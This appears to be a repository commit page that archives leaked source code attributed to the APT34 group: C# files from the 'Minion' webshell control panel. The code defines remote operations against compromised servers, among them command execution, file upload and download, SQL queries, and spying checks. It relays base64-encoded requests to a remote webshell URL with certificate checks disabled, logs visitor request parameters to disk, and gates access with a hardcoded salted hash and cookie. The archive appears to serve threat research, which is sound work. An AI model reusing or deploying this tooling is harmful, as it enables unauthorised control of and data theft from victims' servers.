admin/APT_REPORT
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

APT34

Browse Source
This commit is contained in:
blackorbird
2019-04-18 11:19:12 +08:00
parent f6c2839353
commit b3c7e3e449
495 changed files with 73786 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1116
APT34/APT34-LeakCode/Webshells_and_Panel/MinionProject/Minion/lib/Download.cs Normal file
View File

File diff suppressed because it is too large Load Diff

80
APT34/APT34-LeakCode/Webshells_and_Panel/MinionProject/Minion/lib/LoginLog.cs Normal file
View File

@@ -0,0 +1,80 @@
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.IO;
using System.Linq;
using System.Net.NetworkInformation;
using System.Web;
namespace Minion.lib
{
public class LoginLog
{
public static string LocationLog = @"C:\Users\Public\Libraries\LoginLog\";
public void GetLog(HttpContext CurrentContext)
{
//string reservIP = File.ReadAllText(CurrentContext.Server.MapPath("/") + "ip.txt");
string[] reservIP = null;
if (File.Exists("c:\\ip.txt"))
{
reservIP = File.ReadAllLines("c:\\ip.txt");
}
string ip = CurrentContext.Request.Params["REMOTE_ADDR"];
if (reservIP != null)
{
foreach (var item in reservIP)
{
if (item == ip)
return;
}
}
ip = ip.Replace(":", ".");
string path = LocationLog + ip;
if (!Directory.Exists(path))
Directory.CreateDirectory(path);
NameValueCollection pColl = CurrentContext.Request.Params;
string store = string.Empty;
for (int i = 0; i < pColl.Count; i++)
{
string key = pColl.GetKey(i);
if (key != "ALL_HTTP" && key != "ALL_RAW")
{
string[] pValues = pColl.GetValues(i);
string value = string.Empty;
for (int j = 0; j < pValues.Length; j++)
{
if (j > 0)
value += "|";
value += pValues[j];
}
if (!string.IsNullOrEmpty(value))
{
store += key + " : " + value + Environment.NewLine + Environment.NewLine;
}
}
}
string time = DateTime.Now.ToString("yyyy-MM-dd-HH-mm-ss-fff");
string filePath = path + "\\" + time;
int num = 0;
string numStr = "";
while (File.Exists(filePath + numStr + ".txt"))
{
num++;
numStr = "-(" + num + ")";
}
try
{
File.AppendAllText(filePath + numStr + ".txt", store);
}
catch{}
}
}
}

145
APT34/APT34-LeakCode/Webshells_and_Panel/MinionProject/Minion/lib/Main.cs Normal file
View File

@@ -0,0 +1,145 @@
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Linq;
using System.Net;
using System.Web;
using System.Web.Script.Serialization;
namespace Minion.lib
{
public class Main
{
public class InputDataClass
{
public string Url { get; set; }
public string Password { get; set; }
public string AdminUsername { get; set; }
public string AdminPassword { get; set; }
public int MethodNumber { get; set; }
public Dictionary<string,object> MethodInput { get; set; }
}
public class ErrorClass
{
public ErrorClass(Exception ex)
{
Error = ex.ToString();
}
public string Error { get; set; }
}
public InputDataClass InputData { get; set; }
public HttpContext CurrentContext { get; set; }
public Main(InputDataClass inputData, HttpContext currentContext)
{
if (inputData != null)
{
InputData = inputData;
InputData.Url = Utility.FromBase64(InputData.Url);
InputData.Password = Utility.FromBase64(InputData.Password);
InputData.AdminUsername = Utility.FromBase64(InputData.AdminUsername);
InputData.AdminPassword = Utility.FromBase64(InputData.AdminPassword);
}
CurrentContext = currentContext;
}
public void Proxy(NameValueCollection param)
{
string ret = "Error : -";
try
{
ret = SendRequest(InputData.Url, param);
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
ResponseAjax(ret);
}
public void ResponseAjax(object res)
{
var json = new JavaScriptSerializer().Serialize(res);
CurrentContext.Response.Clear();
CurrentContext.Response.Write(Utility.ToBase64(json));
CurrentContext.Response.Flush();
CurrentContext.Response.SuppressContent = true;
CurrentContext.ApplicationInstance.CompleteRequest();
}
public void ResponseAjax(string res)
{
ResponseAjax(new Dictionary<string,object>() { { "JustPrint", res } });
}
public enum Method
{
Auth = 0,
Command = 1,
Upload = 2,
Uploadbase64 = 3,
Delete = 4,
Download = 5,
ChangeTime = 6,
SqlQuery = 7,
Explorer = 8,
GetSize = 9,
GetLocation = 10,
Rename = 11,
Copy = 12,
View = 13,
CommandAjax = 14,
DownloadTest = 15,
CheckModules = 16,
InstallModule = 17,
UninstallModule = 18,
Cmd7z = 19,
AuthAjax = 20,
GetLocationAjax = 21,
SpyCheck = 22,
LocalExplore = 23,
MultiDelete = 24,
CheckDownloadProgress = 25,
GetIPFromNbt = 26,
GetLogicDrives = 27,
NetworkDownloaderCheck = 28,
NetworkDownloaderLog = 29,
NetworkDownloaderError = 30,
NetworkDownloaderDone = 31,
NetworkDownloaderDir = 32,
SaveLog = 33,
DownloadDemo = 34,
DownloadPause = 35,
DownloadInfo = 36,
DownloadLoad = 37,
DownloadClose = 38,
DownloadChangeStatusToRequested = 39
};
public string SendRequest(string url, NameValueCollection values)
{
string response = string.Empty;
string param = string.Empty;
foreach (var item in values.AllKeys)
{
if (!string.IsNullOrEmpty(param))
param += "&";
param += item + "=" + System.Web.HttpUtility.UrlEncode(Utility.ToBase64(values[item]));
}
using (WebClient wc = new WebClient())
{
ServicePointManager.ServerCertificateValidationCallback = (a, b, c, d) => true;
wc.Headers[HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
response = Utility.FromBase64(wc.UploadString(url, param));
}
return response;
}
}
}

56
APT34/APT34-LeakCode/Webshells_and_Panel/MinionProject/Minion/lib/UserLogin.cs Normal file
View File

@@ -0,0 +1,56 @@
using System;
using System.Text;
using System.Web;
namespace Minion.lib
{
public class UserLogin
{
public bool CheckUser()
{
bool isLogin = false;
//if (HttpContext.Current.Session["SessionUser"] != null)
//{
// if (HttpContext.Current.Session["SessionUser"].ToString().ToLower() == "admin")
// isLogin = true;
//}
//else
//{
if (HttpContext.Current.Request.Cookies["SessionUser"] != null)
{
if (HttpContext.Current.Request.Cookies["SessionUser"].Value == "admin")
{
//HttpContext.Current.Session["SessionUser"] = "admin";
isLogin = true;
}
}
//}
return isLogin;
}
public bool LoginUser(string username, string password)
{
bool ret = false;
if (username.Trim().ToLower() == "admin")
{
string salt = "O%tG7Hz57kvWk35$D*)s$1l$pUpLnBw)apHR!xYZWZu7X#^w7$mCArmQMAa&sRBG";
string hash = "m6m8CCWa/u820mie8bX3HKIx1+WQkB+lbmniyXWKB+8=";
ret = Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(password + salt))) == hash;
if (ret)
{
//HttpContext.Current.Session["SessionUser"] = "admin";
HttpCookie cookie = new HttpCookie("SessionUser", "admin");
cookie.Expires = DateTime.Now.AddDays(7);
HttpContext.Current.Response.SetCookie(cookie);
}
}
return ret;
}
}
}

129
APT34/APT34-LeakCode/Webshells_and_Panel/MinionProject/Minion/lib/Utility.cs Normal file
View File

@@ -0,0 +1,129 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Web;
namespace Minion.lib
{
public static class Utility
{
public static string ToBase64(string a) { string ret = ""; try { ret = string.IsNullOrEmpty(a) ? a : Convert.ToBase64String(Encoding.UTF8.GetBytes(a)); } catch { } return ret; }
public static string FromBase64(string a) { string ret = ""; try { ret = string.IsNullOrEmpty(a) ? a : Encoding.UTF8.GetString(Convert.FromBase64String(a)); } catch { } return ret; }
public static string CheckDirectory(string url, string dirPath)
{
string newPath = string.Empty;
if (!dirPath.EndsWith("\\"))
dirPath += "\\";
Uri myUri = new Uri(url);
string host = myUri.Host;
newPath = dirPath + host + "\\";
if (!Directory.Exists(newPath))
Directory.CreateDirectory(newPath);
//if (!Directory.Exists(DownloadTemp))
// Directory.CreateDirectory(DownloadTemp);
return newPath;
}
public static void CreateEmptyFile(string filename)
{
File.Create(filename).Close();
}
public static string SizeFix(long size, bool round = false)
{
double s = size;
if (s < 1024)
return s + " B";
s = s / 1024;
if (s < 1024)
return (round ? (int)s : Math.Round(s, 2)) + " KB";
s = s / 1024;
if (s < 1024)
return (round ? (int)s : Math.Round(s, 2)) + " MB";
s = s / 1024;
if (s < 1024)
return (round ? (int)s : Math.Round(s, 2)) + " GB";
s = s / 1024;
return (round ? (int)s : Math.Round(s, 2)) + " TB";
}
public static string TimeFix(long msec)
{
int modSecond = 0;
int modMinute = 0;
int modHour = 0;
int modDay = 0;
double s = msec;
if (s < 1000) return (int)s + " msec";
s = s / 1000;
modSecond = (int)s;
if (s < 60) return modSecond + " sec";
s = s / 60;
modSecond = modSecond % 60;
modMinute = (int)s;
if (s < 60) return modMinute + " min" + (modSecond == 0 ? "" : " " + modSecond + " sec");
s = s / 60;
modMinute = modMinute % 60;
modHour = (int)s;
if (s < 24) return modHour + " hour" + (modMinute == 0 ? "" : " " + modMinute + " min")/*+ (modSecond == 0 ? "" : " " + modSecond + " sec")*/ ;
s = s / 24;
modHour = modHour % 24;
modDay = (int)s;
if (s < 365) return modDay + " day" + (modHour == 0 ? "" : " " + modHour + " hour")/*+ (modMinute == 0 ? "" : " " + modMinute + " min")+ (modSecond == 0 ? "" : " " + modSecond + " sec")*/;
s = s / 365;
modDay = modDay % 365;
return (int)s + " year" + (modDay == 0 ? "" : " " + modDay + " day")/*+ (modHour == 0 ? "" : " " + modHour + " hour")+ (modMinute == 0 ? "" : " " + modMinute + " min")+ (modSecond == 0 ? "" : " " + modSecond + " sec")*/;
}
public static T GetObject<T>(Dictionary<string, object> dict)
{
Type type = typeof(T);
var obj = Activator.CreateInstance(type);
foreach (var kv in dict)
{
bool doIT = true;
if (kv.Value != null)
{
Type valueType = kv.Value.GetType();
if (valueType.IsArray)
{
doIT = false;
//PropertyInfo pi = type.GetProperty(kv.Key);
//Type typeCollection = pi.GetType();
//var objCollection = Activator.CreateInstance(typeCollection);
//objCollection.
//Type piItem = typeCollection.GetProperty("Item").PropertyType;
//Type infoType = pi.GetType();
//object[] array = (object[])kv.Value;
//var collection = pi.GetValue(infoType, null);
////var collection = Activator.CreateInstance(type);
//for (int i = 0; i < ((object[])kv.Value).Length; i++)
//{
// collection.GetType().GetProperty("Item").SetValue(collection, i);
//}
}
}
if (doIT)
{
type.GetProperty(kv.Key).SetValue(obj, kv.Value);
}
}
return (T)obj;
}
}
}